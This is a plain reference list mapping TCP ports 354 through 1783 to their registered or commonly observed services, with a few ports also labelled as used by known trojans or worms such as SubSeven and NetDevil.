TCP 354 bh611
TCP 355 DATEX-ASN
TCP 356 Cloanto Net 1
TCP 357 bhevent
TCP 358 Shrinkwrap
TCP 359 Tenebris Network Trace Service
TCP 360 scoi2odialog
TCP 361 Semantix
TCP 362 SRS Send
TCP 363 RSVP Tunnel
TCP 364 Aurora CMGR
TCP 365 DTK
TCP 366 ODMR
TCP 367 MortgageWare
TCP 368 QbikGDP
TCP 369 rpc2portmap
TCP 370 codaauth2
TCP 371 Clearcase
TCP 372 ListProcessor
TCP 373 Legent Corporation
TCP 374 Legent Corporation
TCP 375 Hassle
TCP 376 Amiga Envoy Network Inquiry Proto
TCP 377 NEC Corporation
TCP 378 NEC Corporation
TCP 379 TIA/EIA/IS-99 modem client
TCP 380 TIA/EIA/IS-99 modem server
TCP 381 hp performance data collector
TCP 382 hp performance data managed node
TCP 383 hp performance data alarm manager
TCP 384 A Remote Network Server System
TCP 385 IBM Application
TCP 386 ASA Message Router Object Def.
TCP 387 Appletalk Update-Based Routing Pro.
TCP 388 Unidata LDM
TCP 389 Lightweight Directory Access Protocol / Internet Locator Service (ILS)
TCP 390 UIS
TCP 391 SynOptics SNMP Relay Port
TCP 392 SynOptics Port Broker Port
TCP 393 Data Interpretation System
TCP 394 EMBL Nucleic Data Transfer
TCP 395 NETscout Control Protocol
TCP 396 Novell Netware over IP
TCP 397 Multi Protocol Trans. Net.
TCP 398 Kryptolan
TCP 399 ISO Transport Class 2 Non-Control over TCP
TCP 400 Workstation Solutions
TCP 401 Uninterruptible Power Supply
TCP 402 Genie Protocol
TCP 403 decap
TCP 404 nced
TCP 405 ncld
TCP 406 Interactive Mail Support Protocol
TCP 407 Timbuktu
TCP 408 Prospero Resource Manager Sys. Man.
TCP 409 Prospero Resource Manager Node Man.
TCP 410 DECLadebug Remote Debug Protocol
TCP 411 Remote MT Protocol
TCP 412 NeoModus Direct Connect (Windows file sharing program) / Trap Convention Port
TCP 413 SMSP
TCP 414 InfoSeek
TCP 415 BNet
TCP 416 Silverplatter
TCP 417 Onmux
TCP 418 Hyper-G
TCP 419 Ariel
TCP 420 SMPTE
TCP 421 Ariel
TCP 422 Ariel
TCP 423 IBM Operations Planning and Control Start
TCP 424 IBM Operations Planning and Control Track
TCP 425 ICAD
TCP 426 smartsdp
TCP 427 Server Location
TCP 428 OCS_CMU
TCP 429 OCS_AMU
TCP 430 UTMPSD
TCP 431 UTMPCD
TCP 432 IASD
TCP 433 NNSP
TCP 434 MobileIP-Agent
TCP 435 MobilIP-MN
TCP 436 DNA-CML
TCP 437 comscm
TCP 438 dsfgw
TCP 439 dasp
TCP 440 sgcp
TCP 441 decvms-sysmgt
TCP 442 cvc_hostd
TCP 443 HTTP protocol over TLS/SSL
TCP 444 Simple Network Paging Protocol
TCP 445 Microsoft-DS
TCP 446 DDM-RDB
TCP 447 DDM-RFM
TCP 448 DDM-SSL
TCP 449 AS Server Mapper
TCP 450 TServer
TCP 451 Cray Network Semaphore server
TCP 452 Cray SFS config server
TCP 453 CreativeServer
TCP 454 ContentServer
TCP 455 CreativePartnr
TCP 456 macon-tcp
TCP 457 scohelp
TCP 458 apple quick time
TCP 459 ampr-rcmd
TCP 460 skronk
TCP 461 DataRampSrv
TCP 462 DataRampSrvSec
TCP 463 alpes
TCP 464 kpasswd
TCP 465 SMTPS
TCP 466 digital-vrc
TCP 467 mylex-mapd
TCP 468 proturis
TCP 469 Radio Control Protocol
TCP 470 scx-proxy
TCP 471 Mondex
TCP 472 ljk-login
TCP 473 hybrid-pop
TCP 474 tn-tl-w1
TCP 475 tcpnethaspsrv
TCP 476 tn-tl-fd1
TCP 477 ss7ns
TCP 478 spsc
TCP 479 iafserver
TCP 480 iafdbase
TCP 481 Ph service
TCP 482 bgs-nsi
TCP 483 ulpnet
TCP 484 Integra Software Management Environment
TCP 485 Air Soft Power Burst
TCP 486 avian
TCP 487 saft Simple Asynchronous File Transfer
TCP 488 gss-HTTP
TCP 489 nest-protocol
TCP 490 micom-pfs
TCP 491 go-login
TCP 492 Transport Independent Convergence for FNA
TCP 493 Transport Independent Convergence for FNA
TCP 494 POV-Ray
TCP 495 intecourier
TCP 496 PIM-RP-DISC
TCP 497 dantz
TCP 498 siam
TCP 499 ISO ILL Protocol
TCP 500 isakmp
TCP 501 STMF
TCP 502 asa-appl-proto
TCP 503 Intrinsa
TCP 504 citadel
TCP 505 mailbox-lm
TCP 506 ohimsrv
TCP 507 crs
TCP 508 xvttp
TCP 509 snare
TCP 510 FirstClass Protocol
TCP 511 PassGo
TCP 512 Remote process execution
TCP 513 Remote Login
TCP 514 Remote Shell
TCP 515 spooler
TCP 516 videotex
TCP 517 like tenex link but across
TCP 518 talkd
TCP 519 unixtime
TCP 520 extended file name server
TCP 521 ripng
TCP 522 User Location Service / ULP
TCP 523 IBM-DB2
TCP 524 NCP
TCP 525 timeserver
TCP 526 newdate
TCP 527 Stock IXChange
TCP 528 Customer IXChange
TCP 529 IRC-SERV
TCP 530 rpc
TCP 531 chat
TCP 532 readnews
TCP 533 for emergency broadcasts
TCP 534 MegaMedia Admin
TCP 535 iiop
TCP 536 opalis-rdv
TCP 537 Networked Media Streaming Protocol
TCP 538 gdomap
TCP 539 Apertus Technologies Load Determination
TCP 540 uucpd
TCP 541 uucp-rlogin
TCP 542 commerce
TCP 543 kerberos (v4/v5)
TCP 544 krcmd
TCP 545 appleqtcsrvr
TCP 546 DHCPv6 Client
TCP 547 DHCPv6 Server
TCP 548 AppleShare AFP over TCP
TCP 549 IDFP
TCP 550 new-who
TCP 551 cybercash
TCP 552 deviceshare
TCP 553 pirp
TCP 554 Real Time Stream Control Protocol
TCP 555 phAse Zero backdoor (Win 9x, NT) / dsf
TCP 556 rfs server
TCP 557 openvms-sysipc
TCP 558 SDNSKMP
TCP 559 TEEDTAP
TCP 560 rmonitord
TCP 561 monitor
TCP 562 chcmd
TCP 563 AOL IM / NNTP protocol over TLS/SSL
TCP 564 plan 9 file service
TCP 565 whoami
TCP 566 streettalk
TCP 567 banyan-rpc
TCP 568 microsoft shuttle
TCP 569 microsoft rome
TCP 570 demon
TCP 571 udemon
TCP 572 sonar
TCP 573 banyan-vip
TCP 574 FTP Software Agent System
TCP 575 VEMMI
TCP 576 ipcd
TCP 577 vnas
TCP 578 ipdd
TCP 579 decbsrv
TCP 580 SNTP HEARTBEAT
TCP 581 Bundle Discovery Protocol
TCP 582 SCC Security
TCP 583 Philips Video-Conferencing
TCP 584 Key Server
TCP 585 IMAP4+SSL
TCP 586 Password Change
TCP 587 Message Submission (Sendmail)
TCP 588 CAL
TCP 589 EyeLink
TCP 590 TNS CML
TCP 591 FileMaker Inc. - HTTP Alternate
TCP 592 Eudora Set
TCP 593 HTTP RPC Ep Map
TCP 594 TPIP
TCP 595 CAB Protocol
TCP 596 SMSD
TCP 597 PTC Name Service
TCP 598 SCO Web Server Manager 3
TCP 599 Aeolon Core Protocol
TCP 600 Sun IPC server
TCP 606 Cray Unified Resource Manager
TCP 607 nqs
TCP 608 Sender-Initiated/Unsolicited File Transfer
TCP 609 npmp-trap
TCP 610 Apple Admin Service / npmp-local
TCP 611 npmp-gui
TCP 612 HMMP Indication
TCP 613 HMMP Operation
TCP 614 SSLshell
TCP 615 Internet Configuration Manager
TCP 616 SCO System Administration Server
TCP 617 SCO Desktop Administration Server
TCP 618 DEI-ICDA
TCP 619 Digital EVM
TCP 620 SCO WebServer Manager
TCP 621 ESCP
TCP 622 Collaborator
TCP 623 Aux Bus Shunt
TCP 624 Crypto Admin
TCP 625 DEC DLM
TCP 626 ASIA
TCP 627 PassGo Tivoli
TCP 628 QMQP
TCP 629 3Com AMP3
TCP 630 RDA
TCP 631 IPP (Internet Printing Protocol)
TCP 632 bmpp
TCP 633 Service Status update (Sterling Software)
TCP 634 ginad
TCP 635 RLZ DBase
TCP 636 LDAP protocol over TLS/SSL
TCP 637 lanserver
TCP 638 mcns-sec
TCP 639 MSDP
TCP 640 entrust-sps
TCP 641 repcmd
TCP 642 ESRO-EMSDP V1.3
TCP 643 SANity
TCP 644 dwr
TCP 645 PSSC
TCP 646 LDP
TCP 647 DHCP Failover
TCP 648 Registry Registrar Protocol (RRP)
TCP 649 Aminet
TCP 650 OBEX
TCP 651 IEEE MMS
TCP 652 UDLR_DTCP
TCP 653 RepCmd
TCP 654 AODV
TCP 655 TINC
TCP 656 SPMP
TCP 657 RMC
TCP 658 TenFold
TCP 659 URL Rendezvous
TCP 660 MacOS Server Admin
TCP 661 HAP
TCP 662 PFTP
TCP 663 PureNoise
TCP 664 Secure Aux Bus
TCP 665 Sun DR
TCP 666 doom Id Software
TCP 667 campaign contribution disclosures - SDR Technologies
TCP 668 MeComm
TCP 669 MeRegister
TCP 670 VACDSM-SWS
TCP 671 VACDSM-APP
TCP 672 VPPS-QUA
TCP 673 CIMPLEX
TCP 674 ACAP
TCP 675 DCTP
TCP 676 VPPS Via
TCP 677 Virtual Presence Protocol
TCP 678 GNU Gereration Foundation NCP
TCP 679 MRM
TCP 680 entrust-aaas
TCP 681 entrust-aams
TCP 682 XFR
TCP 683 CORBA IIOP
TCP 684 CORBA IIOP SSL
TCP 685 MDC Port Mapper
TCP 686 Hardware Control Protocol Wismar
TCP 687 asipregistry
TCP 688 REALM-RUSD
TCP 689 NMAP
TCP 690 VATP
TCP 691 MS Exchange Routing
TCP 692 Hyperwave-ISP
TCP 693 connendp
TCP 694 ha-cluster
TCP 695 IEEE-MMS-SSL
TCP 696 RUSHD
TCP 697 UUIDGEN
TCP 698 OLSR
TCP 704 errlog copy/server daemon
TCP 705 AgentX
TCP 706 SILC
TCP 707 W32.Nachi Worm / Borland DSJ
TCP 709 Entrust Key Management Service Handler
TCP 710 Entrust Administration Service Handler
TCP 711 Cisco TDP
TCP 729 IBM NetView DM/6000 Server/Client
TCP 730 IBM NetView DM/6000 send/tcp
TCP 731 IBM NetView DM/6000 receive/tcp
TCP 740 (old) NETscout Control Protocol (old)
TCP 741 netGW
TCP 742 Network based Rev. Cont. Sys.
TCP 744 Flexible License Manager
TCP 747 Fujitsu Device Control
TCP 748 Russell Info Sci Calendar Manager
TCP 749 kerberos administration
TCP 750 rfile
TCP 751 pump
TCP 752 Kerberos password server
TCP 753 Kerberos userreg server
TCP 754 send
TCP 758 nlogin
TCP 759 con
TCP 760 kreg, kerberos/4 registration
TCP 761 kpwd, Kerberos/4 password
TCP 762 quotad
TCP 763 cycleserv
TCP 764 omserv
TCP 765 webster
TCP 767 phone
TCP 769 vid
TCP 770 cadlock
TCP 771 rtip
TCP 772 cycleserv2
TCP 773 submit
TCP 774 rpasswd
TCP 775 entomb
TCP 776 wpages
TCP 777 Multiling HTTP
TCP 780 wpgs
TCP 781 HP performance data collector
TCP 782 node HP performance data managed node
TCP 783 HP performance data alarm manager
TCP 786 Concert
TCP 787 QSC
TCP 799 ControlIT / Remotely Possible
TCP 800 mdbs_daemon / Remotely Possible
TCP 801 device
TCP 808 CCProxy
TCP 810 FCP
TCP 828 itm-mcell-s
TCP 829 PKIX-3 CA/RA
TCP 871 SUP server
TCP 873 rsync
TCP 886 ICL coNETion locate server
TCP 887 ICL coNETion server info
TCP 888 CD Database Protocol
TCP 900 Check Point Firewall-1 HTTP administration / OMG Initial Refs
TCP 901 Samba Web Administration Tool / Realsecure / SMPNAMERES/ NetDevil trojan
TCP 902 VMware Authentication Daemon / IDEAFARM-CHAT
TCP 903 IDEAFARM-CATCH / NetDevil trojan
TCP 911 xact-backup
TCP 912 VMware Authentication Daemon
TCP 989 FTP protocol data over TLS/SSL
TCP 990 FTP protocol control over TLS/SSL
TCP 991 Netnews Administration System
TCP 992 Telnet protocol over TLS/SSL
TCP 993 IMAP4 protocol over TLS/SSL
TCP 994 IRC protocol over TLS/SSL
TCP 995 POP3 protocol over TLS/SSL
TCP 996 vsinet
TCP 997 maitrd
TCP 998 busboy
TCP 999 puprouter
TCP 1000 cadlock
TCP 1002 Microsoft Site Server Internet Locator Service (Netmeeting/ICF)
TCP 1008 UFS-aware server
TCP 1010 surf
TCP 1011 Doly (Windows Trojan)
TCP 1023 Reserved
TCP 1024 Reserved
TCP 1025 MSTASK / network blackjack
TCP 1026 MSTASK / Remote Login Network Terminal
TCP 1030 BBN IAD
TCP 1031 InetInfo / BBN IAD
TCP 1032 BBN IAD
TCP 1047 Sun's NEO Object Request Broker
TCP 1048 Sun's NEO Object Request Broker
TCP 1049 Tobit David Postman VPMN
TCP 1050 CORBA Management Agent
TCP 1051 Optima VNET
TCP 1052 Dynamic DNS Tools
TCP 1053 Remote Assistant (RA)
TCP 1054 BRVREAD
TCP 1055 ANSYS - License Manager
TCP 1056 VFO
TCP 1057 STARTRON
TCP 1058 nim
TCP 1059 nimreg
TCP 1060 POLESTAR
TCP 1061 KIOSK
TCP 1062 Veracity
TCP 1063 KyoceraNetDev
TCP 1064 JSTEL
TCP 1065 SYSCOMLAN
TCP 1066 FPO-FNS
TCP 1067 Installation Bootstrap Proto. Serv.
TCP 1068 Installation Bootstrap Proto. Cli.
TCP 1069 COGNEX-INSIGHT
TCP 1070 GMRUpdateSERV
TCP 1071 BSQUARE-VOIP
TCP 1072 CARDAX
TCP 1073 BridgeControl
TCP 1074 FASTechnologies License Manager
TCP 1075 RDRMSHC
TCP 1076 DAB STI-C
TCP 1077 IMGames
TCP 1078 eManageCstp
TCP 1079 ASPROVATalk
TCP 1080 Socks
TCP 1081 PVUNIWIEN
TCP 1082 AMT-ESD-PROT
TCP 1083 Anasoft License Manager
TCP 1084 Anasoft License Manager
TCP 1085 Web Objects
TCP 1086 CPL Scrambler Logging
TCP 1087 CPL Scrambler Internal
TCP 1088 CPL Scrambler Alarm Log
TCP 1089 FF Annunciation
TCP 1090 FF Fieldbus Message Specification
TCP 1091 FF System Management
TCP 1092 OBRPD
TCP 1093 PROOFD
TCP 1094 ROOTD
TCP 1095 NICELink
TCP 1096 Common Name Resolution Protocol
TCP 1097 Sun Cluster Manager
TCP 1098 RMI Activation
TCP 1099 RMI Registry
TCP 1100 MCTP
TCP 1101 PT2-DISCOVER
TCP 1102 ADOBE SERVER 1
TCP 1103 ADOBE SERVER 2
TCP 1104 XRL
TCP 1105 FTRANHC
TCP 1106 ISOIPSIGPORT-1
TCP 1107 ISOIPSIGPORT-2
TCP 1108 ratio-adp
TCP 1109 Pop with Kerberos
TCP 1110 Cluster status info
TCP 1111 LM Social Server
TCP 1112 Intelligent Communication Protocol
TCP 1114 Mini SQL
TCP 1115 ARDUS Transfer
TCP 1116 ARDUS Control
TCP 1117 ARDUS Multicast Transfer
TCP 1123 Murray
TCP 1127 SUP debugging
TCP 1155 Network File Access
TCP 1161 Health Polling
TCP 1162 Health Trap
TCP 1169 TRIPWIRE
TCP 1178 SKK (kanji input)
TCP 1180 Millicent Client Proxy
TCP 1188 HP Web Admin
TCP 1200 SCOL
TCP 1201 Nucleus Sand
TCP 1202 caiccipc
TCP 1203 License Validation
TCP 1204 Log Request Listener
TCP 1205 Accord-MGC
TCP 1206 Anthony Data
TCP 1207 MetaSage
TCP 1208 SEAGULL AIS
TCP 1209 IPCD3
TCP 1210 EOSS
TCP 1211 Groove DPP
TCP 1212 lupa
TCP 1213 MPC LIFENET
TCP 1214 KAZAA (Morpheus)
TCP 1215 scanSTAT 1.0
TCP 1216 ETEBAC 5
TCP 1217 HPSS-NDAPI
TCP 1218 AeroFlight-ADs
TCP 1219 AeroFlight-Ret
TCP 1220 QT SERVER ADMIN
TCP 1221 SweetWARE Apps
TCP 1222 SNI R&D network
TCP 1223 TGP
TCP 1224 VPNz
TCP 1225 SLINKYSEARCH
TCP 1226 STGXFWS
TCP 1227 DNS2Go
TCP 1228 FLORENCE
TCP 1229 Novell ZFS
TCP 1234 Infoseek Search Agent
TCP 1239 NMSD
TCP 1241 Nessus Daemon / remote message service
TCP 1243 SubSeven (Windows Trojan)
TCP 1245 Subseven backdoor remote access tool
TCP 1248 hermes
TCP 1300 H323 Host Call Secure
TCP 1310 Husky
TCP 1311 RxMon
TCP 1312 STI Envision
TCP 1313 BMC_PATROLDB
TCP 1314 Photoscript Distributed Printing System
TCP 1319 Panja-ICSP
TCP 1320 Panja-AXBNET
TCP 1321 PIP
TCP 1335 Digital Notary Protocol
TCP 1345 VPJP
TCP 1346 Alta Analytics License Manager
TCP 1347 multi media conferencing
TCP 1348 multi media conferencing
TCP 1349 Registration Network Protocol
TCP 1350 Registration Network Protocol
TCP 1351 Digital Tool Works (MIT)
TCP 1352 Lotus Notes
TCP 1353 Relief Consulting
TCP 1354 RightBrain Software
TCP 1355 Intuitive Edge
TCP 1356 CuillaMartin Company
TCP 1357 Electronic PegBoard
TCP 1358 CONNLCLI
TCP 1359 FTSRV
TCP 1360 MIMER
TCP 1361 LinX
TCP 1362 TimeFlies
TCP 1363 Network DataMover Requester
TCP 1364 Network DataMover Server
TCP 1365 Network Software Associates
TCP 1366 Novell NetWare Comm Service Platform
TCP 1367 DCS
TCP 1368 ScreenCast
TCP 1369 GlobalView to Unix Shell
TCP 1370 Unix Shell to GlobalView
TCP 1371 Fujitsu Config Protocol
TCP 1372 Fujitsu Config Protocol
TCP 1373 Chromagrafx
TCP 1374 EPI Software Systems
TCP 1375 Bytex
TCP 1376 IBM Person to Person Software
TCP 1377 Cichlid License Manager
TCP 1378 Elan License Manager
TCP 1379 Integrity Solutions
TCP 1380 Telesis Network License Manager
TCP 1381 Apple Network License Manager
TCP 1382 udt_os
TCP 1383 GW Hannaway Network License Manager
TCP 1384 Objective Solutions License Manager
TCP 1385 Atex Publishing License Manager
TCP 1386 CheckSum License Manager
TCP 1387 Computer Aided Design Software Inc LM
TCP 1388 Objective Solutions DataBase Cache
TCP 1389 Document Manager
TCP 1390 Storage Controller
TCP 1391 Storage Access Server
TCP 1392 Print Manager
TCP 1393 Network Log Server
TCP 1394 Network Log Client
TCP 1395 PC Workstation Manager software
TCP 1396 DVL Active Mail
TCP 1397 Audio Active Mail
TCP 1398 Video Active Mail
TCP 1399 Cadkey License Manager
TCP 1400 Cadkey Tablet Daemon
TCP 1401 Goldleaf License Manager
TCP 1402 Prospero Resource Manager
TCP 1403 Prospero Resource Manager
TCP 1404 Infinite Graphics License Manager
TCP 1405 IBM Remote Execution Starter
TCP 1406 NetLabs License Manager
TCP 1407 DBSA License Manager
TCP 1408 Sophia License Manager
TCP 1409 Here License Manager
TCP 1410 HiQ License Manager
TCP 1411 AudioFile
TCP 1412 InnoSys
TCP 1413 Innosys-ACL
TCP 1414 IBM MQSeries
TCP 1415 DBStar
TCP 1416 Novell LU6.2
TCP 1417 Timbuktu Service 1 Port
TCP 1418 Timbuktu Service 2 Port
TCP 1419 Timbuktu Service 3 Port
TCP 1420 Timbuktu Service 4 Port
TCP 1421 Gandalf License Manager
TCP 1422 Autodesk License Manager
TCP 1423 Essbase Arbor Software
TCP 1424 Hybrid Encryption Protocol
TCP 1425 Zion Software License Manager
TCP 1426 Satellite-data Acquisition System 1
TCP 1427 mloadd monitoring tool
TCP 1428 Informatik License Manager
TCP 1429 Hypercom NMS
TCP 1430 Hypercom TPDU
TCP 1431 Reverse Gossip Transport
TCP 1432 Blueberry Software License Manager
TCP 1433 Microsoft-SQL-Server
TCP 1434 Microsoft-SQL-Monitor
TCP 1435 IBM CICS
TCP 1436 Satellite-data Acquisition System 2
TCP 1437 Tabula
TCP 1438 Eicon Security Agent/Server
TCP 1439 Eicon X25/SNA Gateway
TCP 1440 Eicon Service Location Protocol
TCP 1441 Cadis License Management
TCP 1442 Cadis License Management
TCP 1443 Integrated Engineering Software
TCP 1444 Marcam License Management
TCP 1445 Proxima License Manager
TCP 1446 Optical Research Associates License Manager
TCP 1447 Applied Parallel Research LM
TCP 1448 OpenConnect License Manager
TCP 1449 PEport
TCP 1450 Tandem Distributed Workbench Facility
TCP 1451 IBM Information Management
TCP 1452 GTE Government Systems License Man
TCP 1453 Genie License Manager
TCP 1454 interHDL License Manager
TCP 1455 ESL License Manager
TCP 1456 DCA
TCP 1457 Valisys License Manager
TCP 1458 Nichols Research Corp.
TCP 1459 Proshare Notebook Application
TCP 1460 Proshare Notebook Application
TCP 1461 IBM Wireless LAN
TCP 1462 World License Manager
TCP 1463 Nucleus
TCP 1464 MSL License Manager
TCP 1465 Pipes Platform
TCP 1466 Ocean Software License Manager
TCP 1467 CSDMBASE
TCP 1468 CSDM
TCP 1469 Active Analysis Limited License Manager
TCP 1470 Universal Analytics
TCP 1471 csdmbase
TCP 1472 csdm
TCP 1473 OpenMath
TCP 1474 Telefinder
TCP 1475 Taligent License Manager
TCP 1476 clvm-cfg
TCP 1477 ms-sna-server
TCP 1478 ms-sna-base
TCP 1479 dberegister
TCP 1480 PacerForum
TCP 1481 AIRS
TCP 1482 Miteksys License Manager
TCP 1483 AFS License Manager
TCP 1484 Confluent License Manager
TCP 1485 LANSource
TCP 1486 nms_topo_serv
TCP 1487 LocalInfoSrvr
TCP 1488 DocStor
TCP 1489 dmdocbroker
TCP 1490 insitu-conf
TCP 1491 anynetgateway
TCP 1492 stone-design-1
TCP 1493 netmap_lm
TCP 1494 Citrix/ica
TCP 1495 cvc
TCP 1496 liberty-lm
TCP 1497 rfx-lm
TCP 1498 Sybase SQL Any
TCP 1499 Federico Heinz Consultora
TCP 1500 VLSI License Manager
TCP 1501 Satellite-data Acquisition System 3
TCP 1502 Shiva
TCP 1503 MS Netmeeting / T.120 / Databeam
TCP 1504 EVB Software Engineering License Manager
TCP 1505 Funk Software Inc.
TCP 1506 Universal Time daemon (utcd)
TCP 1507 symplex
TCP 1508 diagmond
TCP 1509 Robcad Ltd. License Manager
TCP 1510 Midland Valley Exploration Ltd. Lic. Man.
TCP 1511 3l-l1
TCP 1512 Microsoft's Windows Internet Name Service
TCP 1513 Fujitsu Systems Business of America Inc
TCP 1514 Fujitsu Systems Business of America Inc
TCP 1515 ifor-protocol
TCP 1516 Virtual Places Audio data
TCP 1517 Virtual Places Audio control
TCP 1518 Virtual Places Video data
TCP 1519 Virtual Places Video control
TCP 1520 atm zip office
TCP 1521 Oracle8i Listener / nCube License Manager
TCP 1522 Ricardo North America License Manager
TCP 1523 cichild
TCP 1524 dtspcd / ingres
TCP 1525 Oracle / Prospero Directory Service non-priv
TCP 1526 Prospero Data Access Prot non-priv
TCP 1527 oracle
TCP 1528 micautoreg
TCP 1529 oracle
TCP 1530 Oracle ExtProc (PLSExtProc) / rap-service
TCP 1531 rap-listen
TCP 1532 miroconnect
TCP 1533 Virtual Places Software
TCP 1534 micromuse-lm
TCP 1535 ampr-info
TCP 1536 ampr-inter
TCP 1537 isi-lm
TCP 1538 3ds-lm
TCP 1539 Intellistor License Manager
TCP 1540 rds
TCP 1541 rds2
TCP 1542 gridgen-elmd
TCP 1543 simba-cs
TCP 1544 aspeclmd
TCP 1545 vistium-share
TCP 1546 abbaccuray
TCP 1547 laplink
TCP 1548 Axon License Manager
TCP 1549 Shiva Hose
TCP 1550 Image Storage license manager 3M Company
TCP 1551 HECMTL-DB
TCP 1552 pciarray
TCP 1553 sna-cs
TCP 1554 CACI Products Company License Manager
TCP 1555 livelan
TCP 1556 AshWin CI Tecnologies
TCP 1557 ArborText License Manager
TCP 1558 xingmpeg
TCP 1559 web2host
TCP 1560 asci-val
TCP 1561 facilityview
TCP 1562 pconnectmgr
TCP 1563 Cadabra License Manager
TCP 1564 Pay-Per-View
TCP 1565 WinDD
TCP 1566 CORELVIDEO
TCP 1567 jlicelmd
TCP 1568 tsspmap
TCP 1569 ets
TCP 1570 orbixd
TCP 1571 Oracle Remote Data Base
TCP 1572 Chipcom License Manager
TCP 1573 itscomm-ns
TCP 1574 mvel-lm
TCP 1575 oraclenames
TCP 1576 moldflow-lm
TCP 1577 hypercube-lm
TCP 1578 Jacobus License Manager
TCP 1579 ioc-sea-lm
TCP 1580 tn-tl-r1
TCP 1581 MIL-2045-47001
TCP 1582 MSIMS
TCP 1583 simbaexpress
TCP 1584 tn-tl-fd2
TCP 1585 intv
TCP 1586 ibm-abtact
TCP 1587 pra_elmd
TCP 1588 triquest-lm
TCP 1589 VQP
TCP 1590 gemini-lm
TCP 1591 ncpm-pm
TCP 1592 commonspace
TCP 1593 mainsoft-lm
TCP 1594 sixtrak
TCP 1595 radio
TCP 1596 radio-sm
TCP 1597 orbplus-iiop
TCP 1598 picknfs
TCP 1599 simbaservices
TCP 1600 issd
TCP 1601 aas
TCP 1602 inspect
TCP 1603 pickodbc
TCP 1604 icabrowser
TCP 1605 Salutation Manager (Salutation Protocol)
TCP 1606 Salutation Manager (SLM-API)
TCP 1607 stt
TCP 1608 Smart Corp. License Manager
TCP 1609 isysg-lm
TCP 1610 taurus-wh
TCP 1611 Inter Library Loan
TCP 1612 NetBill Transaction Server
TCP 1613 NetBill Key Repository
TCP 1614 NetBill Credential Server
TCP 1615 NetBill Authorization Server
TCP 1616 NetBill Product Server
TCP 1617 Nimrod Inter-Agent Communication
TCP 1618 skytelnet
TCP 1619 xs-openstorage
TCP 1620 faxportwinport
TCP 1621 softdataphone
TCP 1622 ontime
TCP 1623 jaleosnd
TCP 1624 udp-sr-port
TCP 1625 svs-omagent
TCP 1626 Shockwave
TCP 1627 T.128 Gateway
TCP 1628 LonTalk normal
TCP 1629 LonTalk urgent
TCP 1630 Oracle Net8 Cman
TCP 1631 Visit view
TCP 1632 PAMMRATC
TCP 1633 PAMMRPC
TCP 1634 Log On America Probe
TCP 1635 EDB Server 1
TCP 1636 CableNet Control Protocol
TCP 1637 CableNet Admin Protocol
TCP 1638 CableNet Info Protocol
TCP 1639 cert-initiator
TCP 1640 cert-responder
TCP 1641 InVision
TCP 1642 isis-am
TCP 1643 isis-ambc
TCP 1644 Satellite-data Acquisition System 4
TCP 1645 datametrics
TCP 1646 sa-msg-port
TCP 1647 rsap
TCP 1648 concurrent-lm
TCP 1649 kermit
TCP 1650 nkd
TCP 1651 shiva_confsrvr
TCP 1652 xnmp
TCP 1653 alphatech-lm
TCP 1654 stargatealerts
TCP 1655 dec-mbadmin
TCP 1656 dec-mbadmin-h
TCP 1657 fujitsu-mmpdc
TCP 1658 sixnetudr
TCP 1659 Silicon Grail License Manager
TCP 1660 skip-mc-gikreq
TCP 1661 netview-aix-1
TCP 1662 netview-aix-2
TCP 1663 netview-aix-3
TCP 1664 netview-aix-4
TCP 1665 netview-aix-5
TCP 1666 netview-aix-6
TCP 1667 netview-aix-7
TCP 1668 netview-aix-8
TCP 1669 netview-aix-9
TCP 1670 netview-aix-10
TCP 1671 netview-aix-11
TCP 1672 netview-aix-12
TCP 1673 Intel Proshare Multicast
TCP 1674 Intel Proshare Multicast
TCP 1675 Pacific Data Products
TCP 1676 netcomm1
TCP 1677 groupwise
TCP 1678 prolink
TCP 1679 darcorp-lm
TCP 1680 microcom-sbp
TCP 1681 sd-elmd
TCP 1682 lanyon-lantern
TCP 1683 ncpm-hip
TCP 1684 SnareSecure
TCP 1685 n2nremote
TCP 1686 cvmon
TCP 1687 nsjtp-ctrl
TCP 1688 nsjtp-data
TCP 1689 firefox
TCP 1690 ng-umds
TCP 1691 empire-empuma
TCP 1692 sstsys-lm
TCP 1693 rrirtr
TCP 1694 rrimwm
TCP 1695 rrilwm
TCP 1696 rrifmm
TCP 1697 rrisat
TCP 1698 RSVP-ENCAPSULATION-1
TCP 1699 RSVP-ENCAPSULATION-2
TCP 1700 mps-raft
TCP 1701 l2tp
TCP 1702 deskshare
TCP 1703 hb-engine
TCP 1704 bcs-broker
TCP 1705 slingshot
TCP 1706 jetform
TCP 1707 vdmplay
TCP 1708 gat-lmd
TCP 1709 centra
TCP 1710 impera
TCP 1711 pptconference
TCP 1712 resource monitoring service
TCP 1713 ConferenceTalk
TCP 1714 sesi-lm
TCP 1715 houdini-lm
TCP 1716 xmsg
TCP 1717 fj-hdnet
TCP 1718 h323gatedisc
TCP 1719 h323gatestat
TCP 1720 h323hostcall
TCP 1721 caicci
TCP 1722 HKS License Manager
TCP 1723 pptp
TCP 1724 csbphonemaster
TCP 1725 iden-ralp
TCP 1726 IBERIAGAMES
TCP 1727 winddx
TCP 1728 TELINDUS
TCP 1729 CityNL License Management
TCP 1730 roketz
TCP 1731 MS Netmeeting / Audio call control / MSICCP
TCP 1732 proxim
TCP 1733 SIMS - SIIPAT Protocol for Alarm Transmission
TCP 1734 Camber Corporation License Management
TCP 1735 PrivateChat
TCP 1736 street-stream
TCP 1737 ultimad
TCP 1738 GameGen1
TCP 1739 webaccess
TCP 1740 encore
TCP 1741 cisco-net-mgmt
TCP 1742 3Com-nsd
TCP 1743 Cinema Graphics License Manager
TCP 1744 ncpm-ft
TCP 1745 ISA Server proxy autoconfig / Remote Winsock
TCP 1746 ftrapid-1
TCP 1747 ftrapid-2
TCP 1748 oracle-em1
TCP 1749 aspen-services
TCP 1750 Simple Socket Library's PortMaster
TCP 1751 SwiftNet
TCP 1752 Leap of Faith Research License Manager
TCP 1753 Translogic License Manager
TCP 1754 oracle-em2
TCP 1755 Microsoft Streaming Server
TCP 1756 capfast-lmd
TCP 1757 cnhrp
TCP 1758 tftp-mcast
TCP 1759 SPSS License Manager
TCP 1760 www-ldap-gw
TCP 1761 cft-0
TCP 1762 cft-1
TCP 1763 cft-2
TCP 1764 cft-3
TCP 1765 cft-4
TCP 1766 cft-5
TCP 1767 cft-6
TCP 1768 cft-7
TCP 1769 bmc-net-adm
TCP 1770 bmc-net-svc
TCP 1771 vaultbase
TCP 1772 EssWeb Gateway
TCP 1773 KMSControl
TCP 1774 global-dtserv
TCP 1776 Federal Emergency Management Information System
TCP 1777 powerguardian
TCP 1778 prodigy-internet
TCP 1779 pharmasoft
TCP 1780 dpkeyserv
TCP 1781 answersoft-lm
TCP 1782 HP JetSend
TCP 1783 Port 04/14/00 fujitsu.co.jp
